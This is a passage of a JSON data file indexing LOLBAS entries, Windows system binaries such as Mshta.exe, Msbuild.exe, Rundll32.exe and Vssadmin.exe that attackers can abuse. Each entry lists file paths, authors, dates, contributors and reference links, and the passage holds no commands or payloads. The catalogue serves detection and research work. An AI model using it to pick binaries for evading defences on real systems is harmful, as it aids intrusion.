Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"author":"Oddvar Moe","created":"2020-03-20T00:00:00.000Z","contributors":["Askar @mohammadaskar2","Oddvar Moe @oddvarmoe","RichRumble","Cedric @th3c3dr1c"],"references":["https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"count":3},{"id":"lolbas:msbuild-exe","name":"Msbuild.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Cn33liz @Cneelis","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"count":5},{"id":"lolbas:msconfig-exe","name":"Msconfig.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msconfig.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"],"count":1},{"id":"lolbas:msdt-exe","name":"Msdt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Msdt.exe","C:\\Windows\\SysWOW64\\Msdt.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msdt/"],"count":3},{"id":"lolbas:msedge-exe","name":"Msedge.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe","c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msedge/"],"count":3},{"id":"lolbas:mshta-exe","name":"Mshta.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\mshta.exe","C:\\Windows\\SysWOW64\\mshta.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Mshta/"],"count":5},{"id":"lolbas:msiexec-exe","name":"Msiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["netbiosX @netbiosX","Philip Tsukerman @PhilipTsukerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"],"count":5},{"id":"lolbas:msoxmled-exe","name":"msoxmled.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"author":"Bogac Kaya","created":"2025-08-22T00:00:00.000Z","contributors":["Bogac Kaya @bogackayaa","Furkan Celik @frknclk034"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"],"count":1},{"id":"lolbas:netsh-exe","name":"Netsh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"author":"Freddie Barr-Smith","created":"2019-12-24T00:00:00.000Z","contributors":["Freddie Barr-Smith","Riccardo Spolaor","Mariano Graziano","Xabier Ugarte-Pedrero"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Netsh/"],"count":1},{"id":"lolbas:ngen-exe","name":"Ngen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"author":"Avihay Eldad","created":"2024-02-19T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"],"count":1},{"id":"lolbas:odbcconf-exe","name":"Odbcconf.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"],"count":3},{"id":"lolbas:offlinescannershell-exe","name":"OfflineScannerShell.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"],"count":1},{"id":"lolbas:onedrivestandaloneupdater-exe","name":"OneDriveStandaloneUpdater.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"author":"Elliot Killick","created":"2021-08-22T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"],"count":1},{"id":"lolbas:pcalua-exe","name":"Pcalua.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcalua.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan","Fab @0rbz_"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"count":3},{"id":"lolbas:pcwrun-exe","name":"Pcwrun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"count":2},{"id":"lolbas:pktmon-exe","name":"Pktmon.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"author":"Derek Johnson","created":"2020-08-12T00:00:00.000Z","contributors":["Derek Johnson"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"count":2},{"id":"lolbas:pnputil-exe","name":"Pnputil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\system32\\pnputil.exe"],"author":"Hai vaknin (lux)","created":"2020-12-25T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @LuxNoBulIshit","Avihay eldad @aloneliassaf"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"],"count":1},{"id":"lolbas:presentationhost-exe","name":"Presentationhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"count":2},{"id":"lolbas:print-exe","name":"Print.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Print/"],"count":3},{"id":"lolbas:printbrm-exe","name":"PrintBrm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"author":"Elliot Killick","created":"2021-06-21T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"count":2},{"id":"lolbas:provlaunch-exe","name":"Provlaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\provlaunch.exe"],"author":"Grzegorz Tworek","created":"2023-06-30T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"],"count":1},{"id":"lolbas:psr-exe","name":"Psr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"author":"Leon Rodenko","created":"2020-06-27T00:00:00.000Z","contributors":["Leon Rodenko @L3m0nada"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Psr/"],"count":1},{"id":"lolbas:query-exe","name":"Query.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"],"count":1},{"id":"lolbas:rasautou-exe","name":"Rasautou.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rasautou.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["FireEye @FireEye"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"],"count":1},{"id":"lolbas:rdrleakdiag-exe","name":"rdrleakdiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"author":"John Dwyer","created":"2022-05-18T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"count":3},{"id":"lolbas:reg-exe","name":"Reg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"count":2},{"id":"lolbas:regasm-exe","name":"Regasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"count":2},{"id":"lolbas:regedit-exe","name":"Regedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\regedit.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"count":2},{"id":"lolbas:regini-exe","name":"Regini.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"author":"Oddvar Moe","created":"2020-07-03T00:00:00.000Z","contributors":["Eli Salem @elisalem9"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regini/"],"count":1},{"id":"lolbas:register-cimprovider-exe","name":"Register-cimprovider.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Philip Tsukerman @PhilipTsukerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"],"count":1},{"id":"lolbas:regsvcs-exe","name":"Regsvcs.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"count":2},{"id":"lolbas:regsvr32-exe","name":"Regsvr32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"count":6},{"id":"lolbas:replace-exe","name":"Replace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["elceef @elceef"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"count":2},{"id":"lolbas:reset-exe","name":"Reset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"author":"Matan Bahar","created":"2025-07-31T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"],"count":1},{"id":"lolbas:rpcping-exe","name":"Rpcping.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Vincent Yiu @vysecurity","Antonio Cocomazzi @splinter_code","ap @decoder_it"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"count":2},{"id":"lolbas:rundll32-exe","name":"Rundll32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Jimmy @bohops","Sailay @404death","Martin Ingesen @Mrtn9"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"count":5},{"id":"lolbas:runexehelper-exe","name":"Runexehelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\runexehelper.exe"],"author":"Grzegorz Tworek","created":"2022-12-13T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"],"count":1},{"id":"lolbas:runonce-exe","name":"Runonce.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runonce/"],"count":1},{"id":"lolbas:runscripthelper-exe","name":"Runscripthelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"],"count":1},{"id":"lolbas:sc-exe","name":"Sc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"count":2},{"id":"lolbas:schtasks-exe","name":"Schtasks.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"count":2},{"id":"lolbas:scp-exe","name":"scp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"author":"BinFault","created":"2026-06-03T00:00:00.000Z","contributors":["BinFault @binfault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/scp/"],"count":2},{"id":"lolbas:scriptrunner-exe","name":"Scriptrunner.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Tyrer @nicktyrer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"count":2},{"id":"lolbas:setres-exe","name":"Setres.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\setres.exe"],"author":"Grzegorz Tworek","created":"2022-10-21T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Setres/"],"count":1},{"id":"lolbas:settingsynchost-exe","name":"SettingSyncHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Adam @hexacorn","Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"],"count":2},{"id":"lolbas:sftp-exe","name":"Sftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"author":"Swachchhanda Shrawan Poudel","created":"2025-05-13T00:00:00.000Z","contributors":["Swachchhanda Shrawan Poudel @_swachchhanda_","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sftp/"],"count":2},{"id":"lolbas:sigverif-exe","name":"Sigverif.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"author":"Moshe Kaplan","created":"2021-11-08T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"],"count":1},{"id":"lolbas:ssh-exe","name":"ssh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"author":"Akshat Pradhan","created":"2021-11-08T00:00:00.000Z","contributors":["Akshat Pradhan","Felix Boulet","Edo Maland"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"count":3},{"id":"lolbas:stordiag-exe","name":"Stordiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"author":"Eral4m","created":"2021-10-21T00:00:00.000Z","contributors":["Eral4m @eral4m","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"],"count":2},{"id":"lolbas:syncappvpublishingserver-exe","name":"SyncAppvPublishingServer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas"],"references":["https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"],"count":1},{"id":"lolbas:tar-exe","name":"Tar.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"author":"Brian Lucero","created":"2023-01-30T00:00:00.000Z","contributors":["Brian Lucero @Cyber_Sorcery","Avester Fahimipour"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"count":3},{"id":"lolbas:ttdinject-exe","name":"Ttdinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"author":"Maxime Nadeau","created":"2020-05-12T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Maxime Nadeau @m_nad0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"],"count":2},{"id":"lolbas:tttracer-exe","name":"Tttracer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"author":"Oddvar Moe","created":"2019-11-05T00:00:00.000Z","contributors":["Onur Ulusoy @oulusoyum","Matt Graeber @mattifestation"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"],"count":2},{"id":"lolbas:unregmp2-exe","name":"Unregmp2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"author":"Wade Hickey","created":"2021-12-06T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"],"count":1},{"id":"lolbas:vbc-exe","name":"vbc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"author":"Lior Adar","created":"2020-02-27T00:00:00.000Z","contributors":["Lior Adar","Hai Vaknin(Lux)"],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"],"count":2},{"id":"lolbas:verclsid-exe","name":"Verclsid.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"],"count":1},{"id":"lolbas:vssadmin-exe","name":"Vssadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"author":"mmadersbacher","created":"2026-08-16T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"],"count":1},{"id":"lolbas:wab-exe","name":"Wab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wab/"],"count":1},{"id":"lolbas:wbadmin-exe","name":"wbadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"author":"Chris Eastwood","created":"2024-04-05T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"],"count":2},{"id":"lolbas:wbemtest-exe","name":"wbemtest.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"author":"saulpanders","created":"2025-04-22T00:00:00.000Z","contributors":["Paul Sanders @saulpanders"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"],"count":1},{"id":"lolbas:winget-exe","name":"winget.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"author":"Paul Sanders","created":"2022-01-03T00:00:00.000Z","contributors":["Paul @saulpanders","Konrad 'unrooted' Klawikowski","Fredrik H. Brathen"],"references":["https://lolbas-project.github.io/lolbas/Binaries/winget/"],"count":3},{"id":"lolbas:wlrmdr-exe","name":"Wlrmdr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"author":"Moshe Kaplan","created":"2022-02-16T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Oddvar Moe @Oddvarmoe","Freddy @falsneg"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"],"count":1},{"id":"lolbas:wmic-exe","name":"Wmic.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"count":7},{"id":"lolbas:workfolders-exe","name":"WorkFolders.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["John Carroll @YoSignals","Elliot Killick @elliotkillick","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"],"count":2},{"id":"lolbas:wscript-exe","name":"Wscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","SaiLay(valen) 